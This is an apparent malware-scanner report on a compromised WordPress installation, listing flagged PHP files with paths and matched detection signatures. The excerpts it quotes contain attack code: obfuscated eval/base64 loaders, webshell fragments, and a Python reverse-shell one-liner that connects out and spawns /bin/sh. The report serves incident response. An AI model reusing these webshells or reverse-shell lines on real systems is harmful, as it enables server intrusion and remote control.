Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'tW1yeV7BkqWZ2Y6ZmdmOmZkZPzPE/JmZmZk+sx3bMTPFzMzsmJmZKdm89+bNdXRUTXal7R/3aUhKnTporq7ULTWphbMz0NnI2cIR6Ox37fCNSdJVR07BQ9JVVkxQSVySjt/cwtLawYKWc+mmjYaRlOajmYaOn0VNTkxZR05d/6/TgEeQ1MLT0Q51/jfIF9IX3Bf8Ytw3YngHWDsTSgtNFzdGF0p0TRqSGDiwfw4EJtCKUNUsuOSXUGA/pL1IgvhoSo/Ewxb/+Mg3BwfzNXA7a6fxLVs2NycKeI7fx/l/XlSuzwOEhwI+BYug3lHH/uSLByTIxO/RBnAEBLy3qqpcei9jriF83F9qjpZpvviMuS6KlOTqd0pZmVn4/ICpxdzOYRL6bM6PcGz/GIlDpPNml/D7HPMsnHmOj/WLIFLe9vho6WoADX8L4+6BRuivB0IXV0fowuZDkdT4sHnPAHqBa9V8HnqSiW4qIw6Zapk8b0sAje62BeJ...
Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($mTvIU($XCjpW($IczxX('tW1yeV7BkqWZ2Y6ZmdmOmZkZPzPE/JmZmZk+sx3bMTPFzMzsmJmZKdm89+bNdXRUTXal7R/3aUhKnTporq7ULTWphbMz0NnI2cIR6Ox37fCNSdJVR07BQ9JVVkxQSVySjt/cwtLawYKWc+mmjYaRlOajmYaOn0VNTkxZR05d/6/TgEeQ1MLT0Q51/jfIF9IX3Bf8Ytw3YngHWDsTSgtNFzdGF0p0TRqSGDiwfw4EJtCKUNUsuOSXUGA/pL1IgvhoSo/Ewxb/+Mg3BwfzNXA7a6fxLVs2NycKeI7fx/l/XlSuzwOEhwI+BYug3lHH/uSLByTIxO/RBnAEBLy3qqpcei9jriF83F9qjpZpvviMuS6KlOTqd0pZmVn4/ICpxdzOYRL6bM6PcGz/GIlDpPNml/D7HPMsnHmOj/WLIFLe9vho6WoADX8L4+6BRuivB0IXV0fowuZDkdT4sHnPAHqBa9V8H...
Sign d97f004d Line: 1 Dangerous Malware Signature (hash: d97f004d)	`<?php zdGF0`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/wp-admin/unZIPpeRoax.php

Size: 24.22 kB Created: 2024-06-04 16:39:06 Modified: 2024-06-04 16:39:06 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Line: 1 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'Oi/y/6/6/5/w/K/C+s8/k/9/+/+/19PHMaG6xQPxRQfiI/Be9OONN3OOs6Az0PLGHgcY5axnCFG14dpdvGFO8ZOv8JgXnZ18dBs1MSQgMMdhhl66j+JrmuGLeetJ+VVObHgP4G7nFxQZI9CGrymY0CTVdqFAp6BbWyKuamTaRQPeCCPsS6oMlGOGZmJBOegP1r7XQhBXQCeq3ebE2XpmdRoibS75vNBKWWipEth8ZRgcqVR64+kkUBEc/6eH7kKWDI6IyijvycTf/AIxmmwLecP6J1Rf/Ce2EaGDwn3jONZyqhdlKAe9iyDwSdpkIxm3JLN4vvpfVSNfUVFmDx0ycB0IDihdV+SCqJL/3HskVL5U6uXa/Je9Inpj+goS5hZxVRmCNc8sPrEhwhT8bs8fZFfmcDZn6pff9kAdyTPKV8BuIWjFBJbwyKXD2hgDqbnzLTctlPexL0Gvk16BF+6TC2ixLtsjW6AchJYeBhehAEnq/XDZ4Um...
Function eval Line: 1 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($gqsmw($XIJCA($oxXtM($kAzSn('Oi/y/6/6/5/w/K/C+s8/k/9/+/+/19PHMaG6xQPxRQfiI/Be9OONN3OOs6Az0PLGHgcY5axnCFG14dpdvGFO8ZOv8JgXnZ18dBs1MSQgMMdhhl66j+JrmuGLeetJ+VVObHgP4G7nFxQZI9CGrymY0CTVdqFAp6BbWyKuamTaRQPeCCPsS6oMlGOGZmJBOegP1r7XQhBXQCeq3ebE2XpmdRoibS75vNBKWWipEth8ZRgcqVR64+kkUBEc/6eH7kKWDI6IyijvycTf/AIxmmwLecP6J1Rf/Ce2EaGDwn3jONZyqhdlKAe9iyDwSdpkIxm3JLN4vvpfVSNfUVFmDx0ycB0IDihdV+SCqJL/3HskVL5U6uXa/Je9Inpj+goS5hZxVRmCNc8sPrEhwhT8bs8fZFfmcDZn6pff9kAdyTPKV8BuIWjFBJbwyKXD2hgDqbnzLTctlPexL0Gvk16BF+...
Function strrev exec_strrev Line: 1 Dangerous Encoded Function `exec` [https://www.php.net/exec]	`<?php CeXE`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/wp-admin/Bv96MsLSZ2o.php

Size: 44.01 kB Created: 2024-06-04 19:33:56 Modified: 2024-06-04 19:33:56 Warns: 1 Dangers: 2

Description Match

Function eval Warning

Potentially dangerous function `eval`

<?php eval($Krnoa($wosLc($IlNAn('==jBcxFXcxFXcxFXcxFXcxFXcxFXcxFXquQZjNQZ4OmJqAXkoASGOW0GZqRWbH1G6WTGJcIIYqwEhETEBWSGV9SXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKMbjJL2ITXfSzqyuPouMKM9gGXcxFXAEzLYE0KxtFGmMTrsuvLHMHBjL2HsEPXyEKLfMzocc3MbLKMlWUqmOvolIUqyW3BvEyE5NwMG9SWfSzLik2M7fTGLyUr5ZaDsEPouW2ofq2rc0RMvgREsEPXI9xrvkxInI1F3LxoxExGFkRFsOvoiyTqw5JqzgGK3NQZjtUZo11bRi1HZSxDCk0Ex0wLHMHBjL2HsElBqMQZjtUZo11bRi1HZSxDCk0Ex0mnZuIr4ympP9SW9gwoy...

Sign 7830f7a6 Line: 1 Dangerous

Malware Signature (hash: 7830f7a6)

<?php NvcH

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/wp-admin/zfcpvqrnd.php

Size: 166.78 kB Created: 2024-06-04 19:57:41 Modified: 2024-06-04 19:57:41 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/wp-admin/network.php

Size: 144.79 kB Created: 2022-05-26 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 19

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "PD9waHAKZnVuY3Rpb24gcHduKCRjbWRkKSB7CiAgICBnbG9iYWwgJGFiYywgJGhlbHBlciwgJGJhY2t0cmFjZTsKCiAgICBjbGFzcyBWdWxuIHsKICAgICAgICBwdWJsaWMgJGE7CiAgICAgICAgcHVibGljIGZ1bmN0aW9uIF9fZGVzdHJ1Y3QoKSB7IAogICAgICAgICAgICBnbG9iYWwgJGJhY2t0cmFjZTsgCiAgICAgICAgICAgIHVuc2V0KCR0aGlzLT5hKTsKICAgICAgICAgICAgJGJhY2t0cmFjZSA9IChuZXcgRXhjZXB0aW9uKS0+Z2V0VHJhY2UoKTsgIyA7KQogICAgICAgICAgICBpZighaXNzZXQoJGJhY2t0cmFjZVsxXVsnYXJncyddKSkgeyAjIFBIUCA+PSA3LjQKICAgICAgICAgICAgICAgICRiYWNrdHJhY2UgPSBkZWJ1Z19iYWNrdHJhY2UoKTsKICA...
Exploit double_var Warning Double var technique is usually used for the obfuscation of malicious code	<?php ${${"GLOBALS"}["vmolgtof"]}=count(${${"GLOBALS"}["vcqqrlqbo"]});for(${$yienlc}=0;${${"GLOBALS"}["eqkvgoptfvkl"]}<${${"GLOBALS"}["ysjlzvro"]};${${"GLOBALS"}["rtolgl"]}++){${"GLOBALS"}["bpsfsqiel"]="fungsi";${${"GLOBALS"}["bpsfsqiel"]}[]=unx(${${"GLOBALS"}["vcqqrlqbo"]}[${${"GLOBALS"}["eqkvgoptfvkl"]}]);}if(isset($_GET["d"])){$lbcuxxaisydr="cdir";${"GLOBALS"}["ukbgkeds"]="fungsi";${${"GLOBALS"}["qqgfigbd"]}=unx($_GET["d"]);${${"GLOBALS"}["ukbgkeds"]}[14](${$lbcuxxaisydr});}else{${"GLOBALS"}["kussp...
Exploit double_var2 Line: 38 Warning Double var technique is usually used for the obfuscation of malicious code	`<?php ${$gfyfrcaij}`
Exploit escaped_path Line: 38 Dangerous Escaped path technique is usually used for the obfuscation of malicious code	`<?php \x78ft\x61h\x73ho\x66n`
Exploit hex_char Line: 38 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Exploit hex_var Line: 38 Dangerous Hex var technique is usually used for the obfuscation of malicious code, it is also used by IonCube	`<?php ${"\x47\x4c\x4f\x42A\x4cS"}`
Exploit killall Dangerous RCE (Remote Code Execution) that allow remote attackers to kill processes on the target machine	`<?php killall -9`
Function exec Dangerous Encoded Function `exec` [https://www.php.net/exec]	<?php exec(\"/bin/sh -i");};'");}else if($_POST["gecko-bc"]=="python"){${"GLOBALS"}["upnhvmssw"]="HostServer";echo cmd("python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("".${${"GLOBALS"}["upnhvmssw"]}."",".${${"GLOBALS"}["mpogrnq"]}."));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i\"]);'");}else if($_POST["gecko-bc"]=="ruby"){$ffzcwi="PortServer";echo cmd("ruby -rsocket -e'f=TCPSocket.open("".${$...
Sign 00f56a27 Line: 38 Dangerous Malware Signature (hash: 00f56a27)	`<?php ${${`
Sign 0f37c730 Dangerous Malware Signature (hash: 0f37c730)	`<?php meta http-equiv="refresh" content="0;`
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	`<?php Exploit`
Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268)	`<?php exploit`
Sign 237750ea Line: 38 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 407651f7 Dangerous Malware Signature (hash: 407651f7)	`<?php WScript.shell`
Sign 5b557546 Dangerous Malware Signature (hash: 5b557546)	`<?php 65786563`
Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6)	`<?php N5c3Rlb`
Sign 963e968a Dangerous Malware Signature (hash: 963e968a)	`<?php PD9waH`
Sign a408f408 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`
Sign ae7830db Dangerous Malware Signature (hash: ae7830db)	`<?php Y2hy`
Sign cbea68d7 Dangerous Malware Signature (hash: cbea68d7)	`<?php 73797374656d`
Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e)	`<?php Backdoor`
Sign d97f004d Dangerous Malware Signature (hash: d97f004d)	`<?php zeXN0ZW`

/custdata02/turtle/public_html/wp-admin/fyLrBjT5ZH3.php

Size: 43.49 kB Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Warns: 2 Dangers: 1

Description Match

Exploit base64_long Warning

Long Base64 encoded text is usually used for the obfuscation of malicious code

<?php 'Rrw91fdz/83YnCl8/8n5oyXGyLj3JoLUooatYmIWyr1rYpzqZPdghJt9dWC3KOq+yLq5aYSGk/bOps7RPK14haQWzy4j9CO9kM9bwQWo3PmlnZyCCU2D1/Mh1tje7gUl740LAF0iJTrdh2y+POYx8q/dyIRKVhwtuqj8XMJCgoJ067gIFfhpVbpHLM80h8Ip7YYF31WmZzkMZl0ZTfc1V11M5GMp6yYDzMzatRMXO4tb9kUlVZvbqwJGjsLFvNQVFOXdE9jfjNEiyaBNTEodEvJyA8/DwSVbwmxV7WB+jqQySRs2Ji4ZZtB8lXGaCp57x3AVsLVVVxJxsg33/b3BogcEPjmcqWXHVcBpSBfVLlYmRpk+pFYSVrD+X/0HZZAYKIT1p3uynPDbozyvZauynPOho2y0L251MafcXI0jJ12wkSgGGRSPG0kUWPumqUAcrTIsoz9cqTAhqJLuXTMcPwfcXFx4YFNfLGO4ZPjaNNPaVi/VRH8...

Function eval Warning

Potentially dangerous function `eval`

<?php eval($OZycP($IcBFp($DQRCp($PWFGE('Rrw91fdz/83YnCl8/8n5oyXGyLj3JoLUooatYmIWyr1rYpzqZPdghJt9dWC3KOq+yLq5aYSGk/bOps7RPK14haQWzy4j9CO9kM9bwQWo3PmlnZyCCU2D1/Mh1tje7gUl740LAF0iJTrdh2y+POYx8q/dyIRKVhwtuqj8XMJCgoJ067gIFfhpVbpHLM80h8Ip7YYF31WmZzkMZl0ZTfc1V11M5GMp6yYDzMzatRMXO4tb9kUlVZvbqwJGjsLFvNQVFOXdE9jfjNEiyaBNTEodEvJyA8/DwSVbwmxV7WB+jqQySRs2Ji4ZZtB8lXGaCp57x3AVsLVVVxJxsg33/b3BogcEPjmcqWXHVcBpSBfVLlYmRpk+pFYSVrD+X/0HZZAYKIT1p3uynPDbozyvZauynPOho2y0L251MafcXI0jJ12wkSgGGRSPG0kUWPumqUAcrTIsoz9cqTAhqJLuXT...

Sign f9dc0a55 Dangerous

Malware Signature (hash: f9dc0a55)

<?php 'base64_decode'

/custdata02/turtle/public_html/wp-admin/zfcitxsnh.php

Size: 75.71 kB Created: 2024-06-04 20:27:34 Modified: 2024-06-04 20:27:34 Warns: 2 Dangers: 7

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWjm5zvmzUt/W1zDpqS+XiYgM1GnJuGK5+f74UlQN5StYL7j378n6YIkFvWj8i+V6OIlkekZxicT5sKhd1z+HaPY/SIi8xguSAEPeJHShBCkZzcykBesqf357vYG/...
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(gzinflate(base64_decode('TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWjm5zvmzUt/W1zDpqS+XiYgM1GnJuGK5+f74UlQN5StYL7j378n6YIkFvWj8i+V6OIlkekZxicT5sKhd1z+HaPY/SIi8xgu...
Exploit hex_char Line: 2 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5F`
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWj...
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	<?php eval("\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'TJzHlqNqlkbfpSfdazHAuyHeeyNg1QQjvPfw9KWoW4MeKJUhkQr4Oed8e6ckvmfa/9///Osm8H/dJPG7h3837l83Qv3uyd9jzO+e/t2E343457m/bUjsn3/zn+2Q/z6G/vMY+tsO/T2Pi7+f/7sd8ffc//sZof73VlF5neyqmKJSTYwu7pjXDwWJNjHyqA1inuvv+BI5KrSqhLgV4F4oZoNoNOy0JLP4bCMgmG+gXr/kDUUV+aIUutdgxLQ4WttnDLqkT0IouKI1iL4H+UYCjoMn8AUjpQRfyV7tm+bR4tuSNpdSIAjaBMiBOEja4NXiK4DTkoWbmkJbXw8jdWtFt/j9uKf/4VAEQeiQoz75C7waJLU11PHiLOnWj...
Sign 237750ea Line: 2 Dangerous Malware Signature (hash: 237750ea)	`<?php \x65\x76\x61\x6C`
Sign 7830f7a6 Line: 2 Dangerous Malware Signature (hash: 7830f7a6)	`<?php n0Yx`
Sign 8000b2f1 Line: 1 Dangerous Malware Signature (hash: 8000b2f1)	`<?php <?php eval("\x65`
Sign 80e70adc Line: 1 Dangerous Malware Signature (hash: 80e70adc)	`<?php <?php eval`

/custdata02/turtle/public_html/wp-admin/zfcrtwgtf.php

Size: 166.78 kB Created: 2024-06-04 20:48:47 Modified: 2024-06-04 20:48:47 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/wp-content/plugins/akismet/_inc/img/click.php

Size: 1.61 kB Created: 2022-03-21 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1

Description	Match
Sign 963e968a Line: 39 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`

/custdata02/turtle/public_html/wp-content/plugins/akismet/_inc/rtl/index.php

Size: 117.84 kB Created: 2021-12-21 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 7 Dangers: 3

Description	Match
Exploit base64_long Line: 136 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "6d5138716c36443945465a724f3774626a4b706e6a5144716b6130644e505a6e4247306e42465a346b71786e58505a724f3774626a4b346e6c375a764e5057796b3730646d3752394263484750396259565257756b3730646d37523942625a5857397468533856555653485a4357786e42615a726c6134624f36577943465a346b6f34666b616a37516e486a424762736a4b666e695041734f50447a6a62756f50556378435778726b6f34636a504d6f434641734e6162754e513472434b6375414b63436c3641734e4652714165666e42614e786c4752736c6f6778424a49784b61306e426156386b4a45796b6f34616d5170626c613179435...
Exploit base64_long Line: 137 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "456f49726a505a6f423744786c6530714e504475454b38364b7a526e4e554c546c375a764e5057324b6556785855564c53636a51516e4c6a597179636b4a39635752444652627570505475436b3730646d3752394348417553494e6855533448524b705454395a4250385a535363524c5455707a4e5056716b6130396c3744346c6148744e5567656a475a7145656378597178784e6566646c3734734e515a39434841756b3730646d3748634e4644686d51357944464d756d5134626a4830666a473073434b567843556378435074726b47527343485a5356496259424b452b44624165435475436c364c626c6566545249565852525775456...
Exploit base64_long Line: 138 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "6b375239503656786c5152686c4762746d505779414b633244475a796a51347650365a786961533041545771414a75636a3644786a4752684f5438736a517075596f56626b7a44726b623066585134386c47713244465a794e51707558556a386c6148744e554d744f5475676a6e75676d515732454b30656d5135726b3767674251637a596f56634f5152746c373530414a75634e4752656a516b30414a74784e6566616a5134646a4762726c6230626947626e6a46417944364c646c7a567550374e726b61757a4355623244464c784e4a38714f3734396c4830616c364476434b63326d514f7944464c784e4a393042544978693752356d5...
Exploit concat Line: 127 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code	`<?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].`
Exploit concat Line: 128 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code	`<?php $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].`
Exploit concat_vars_array Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code	`<?php $ABC[1].$ABC[3].$ABC[7].$ABC[11].$ABC[7].$ABC[9].$ABC[3].$ABC[10].$ABC[8]; $STr = $ABC[1].$ABC[3].$ABC[7].$ABC[3].$ABC[7]; $BDEC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[14].$ABC[4].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $BENC = $ABC[13].$ABC[0].$ABC[1].$ABC[4].$ABC[12].$ABC[15].$ABC[11].$ABC[4].$ABC[17].$ABC[16].$ABC[9].$ABC[14].$ABC[4]; $WKWK[] = ""; foreach($f_______un as $x => $xx){ $WKWK[$x] = nhx(Dex($xx)); }`
Exploit etc_passwd Line: 1811 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system	`<?php /etc/passwd`
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($x); $r = ob_get_contents(); ob_end_clean(); return $r; } catch (ParseError $e) { return false; } } function IsWin(){ global $WKWK; return $WKWK[27](PHP_OS, 'WIN') !== false; } function Bc($ip, $port, $lang) { global $WKWK, $code; $lang = strtolower($lang); $arg=$ip." ".$port; $cod=Dex($code[$lang]); if($lang == "php"){ $arg=""; $cod='$ip="'.$ip.'";$port='.$port.';'.$cod; } if(!RunCode($arg, $cod, $lang)) return false; } function RunCode($argument, $code, $lang){ global $WKWK; $lang=strtolo...
Sign 7830f7a6 Line: 1570 Dangerous Malware Signature (hash: 7830f7a6)	`<?php nc -l`
Sign b236d073 Line: 1811 Dangerous Malware Signature (hash: b236d073)	`<?php /etc/passwd`

/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/admin/includes/index.php

Size: 85.87 kB Created: 2022-05-09 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 6

Description	Match
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	`<?php base64_decode ( str_rot13 ( join ( '' , $code )`
Exploit hex_char Line: 967 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function]	<?php create_function ( "/\x64\x65\x28\x73\x74\x72/\x24\x63\x6f\x64\x65/\x63\x6f\x64\x65\x29/" , "/\x36\x34\x5f\x64\x65/\x65\x76\x61\x6c\x20\x28\x20\x27\x20\x3f\x3e\x27" . "\x20\x2e\x20\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65\x20\x28" . "\x20\x73\x74\x72\x5f\x72\x6f\x74\x31\x33\x20\x28\x20\x6a\x6f\x69\x6e\x20" . "\x28\x20\x27\x27\x20\x2c\x20\x24\x63\x6f\x64\x65\x20\x29\x20\x29\x20\x29" . "\x20\x2e\x20\x27\x3c\x3f\x70\x68\x70\x20\x27\x20\x29\x3b/\x63\x6f\x64/" ) ; $global_version = ...
Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php eval ( ' ?>' . base64_decode ( str_rot13 ( join ( '' , $code ) ) ) . '<?php ' );/cod/" ) ; $global_version = array_walk ( $register_key , $check_copyright )`
Sign 237750ea Line: 967 Dangerous Malware Signature (hash: 237750ea)	`<?php \x65\x76\x61\x6c`
Sign 237750ea Line: 969 Dangerous Malware Signature (hash: 237750ea)	`<?php \x6a\x6f\x69\x6e`
Sign 99fc3b9d Line: 978 Dangerous Malware Signature (hash: 99fc3b9d)	`<?php $global_version = array_walk /*`

/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/admin/js/index.php

Size: 30.49 kB Created: 2021-11-21 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 7

Description	Match
Exploit etc_passwd Line: 154 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system	`<?php /etc/passwd`
Exploit etc_passwd Line: 232 Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system	`<?php ///etc/passwd`
Exploit htaccess_type Line: 44 Dangerous RCE (Remote Code Execution), through Htaccess add type x-httpd-php/cgi, interpreting PHP code, allow remote attackers to execute PHP code on the target machine	`<?php AddType application/x-httpd-cgi`
Sign 5b557546 Line: 66 Dangerous Malware Signature (hash: 5b557546)	`<?php 65786563`
Sign 963e968a Line: 195 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign b236d073 Line: 154 Dangerous Malware Signature (hash: b236d073)	`<?php /etc/passwd`
Sign cbea68d7 Line: 72 Dangerous Malware Signature (hash: cbea68d7)	`<?php 73797374656d`

/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/includes/block-editor/index.php

Size: 1.45 kB Created: 2022-06-06 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 2

Description	Match
Function eval Dangerous Encoded Function `eval` [https://www.php.net/eval]	`<?php eval("?>" . $xG75u)`
Function eval Line: 42 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval("\x3f\x3e" . $xG75u)`
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	`<?php eval("?>`

/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/includes/css/index.php

Size: 14.24 kB Created: 2022-04-21 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 13

Description	Match
Exploit nano Line: 108 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[9]("{$Jd}/{$F1}")`
Exploit nano Line: 39 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[6]($yf)`
Exploit nano Line: 57 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[1]()`
Exploit nano Line: 66 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[17](JD($_GET["n"])`
Exploit nano Line: 71 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[4]("/(\\\\\|\\/)`
Exploit nano Line: 77 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[12]($BL)`
Exploit nano Line: 81 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[12]("{$Jd}/{$_POST["n"]}")`
Exploit nano Line: 84 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[13]("{$Jd}/{$_POST["n"]}", $_POST["ctn"])`
Exploit nano Line: 87 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[16]($Jd . '/' . jD($_GET["n"])`
Exploit nano Line: 90 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[18]($c8[14]($Jd . '/' . jD($_GET["n"])`
Exploit nano Line: 91 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[13]($Jd . '/' . jD($_GET["n"])`
Exploit nano Line: 94 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[18]($c8[14]($Jd . '/' . jd($_GET["n"])`
Sign 5470607c Line: 63 Dangerous Malware Signature (hash: 5470607c)	`<?php ]} ({$_SERVER[`

/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/includes/swv/swv.php

Size: 3.95 kB Created: 2024-06-02 19:18:05 Modified: 2024-06-02 19:26:52 Dangers: 1

Description	Match
Exploit nano Line: 75 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $rules[$rule_name]( $properties )`

/custdata02/turtle/public_html/wp-content/plugins/contact-form-7/includes/swv/index.php

Size: 145.90 kB Created: 2021-10-25 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 3 Dangers: 18

Description	Match
